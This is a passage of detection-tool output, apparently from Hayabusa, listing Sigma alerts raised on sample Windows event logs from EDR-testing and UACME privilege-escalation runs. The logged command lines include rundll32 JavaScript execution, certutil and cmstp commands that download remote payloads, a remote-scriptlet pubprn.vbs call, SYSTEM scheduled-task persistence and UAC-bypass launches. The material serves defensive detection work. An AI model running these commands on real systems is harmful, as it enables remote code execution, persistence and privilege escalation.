Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:15.252 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 
rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: 
C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf : Path: C:\Windows\System32\cmstp.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\forfiles.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c winrm qc -q : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:35.337 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript //nologo ""C:\Windows\System32\winrm.vbs"" qc -q : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c winrm qc -q ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""} : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: calc : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 
06:34:45.242 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 34 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_34.evtx -2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx -2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 34",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx -2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C: : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx -2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Disk Cleanup,,rules/sigma/process_creation/win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx -2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 33 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 
19:14:02.929 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:07.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe"" : Path: C:\Windows\System32\fodhelper.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 324 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe"" : Path: C:\Windows\System32\fodhelper.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\fodhelper.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx 
-2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,Bypass UAC via Fodhelper.exe,,rules/sigma/process_creation/win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 32 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using Windows Media Player - File,,rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064425400 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s 
Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064425400 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 30 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064427C00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe"" : Path: C:\Windows\SysWOW64\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:17.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064427C00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:18.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe"" : Path: C:\Windows\SysWOW64\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SysWOW64\WerFault.exe 
-pss -s 444 -p 6312 -ip 6312",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80 : Path: C:\Windows\SysWOW64\WerFault.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\syswow64\wusa.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 21:06:53.680 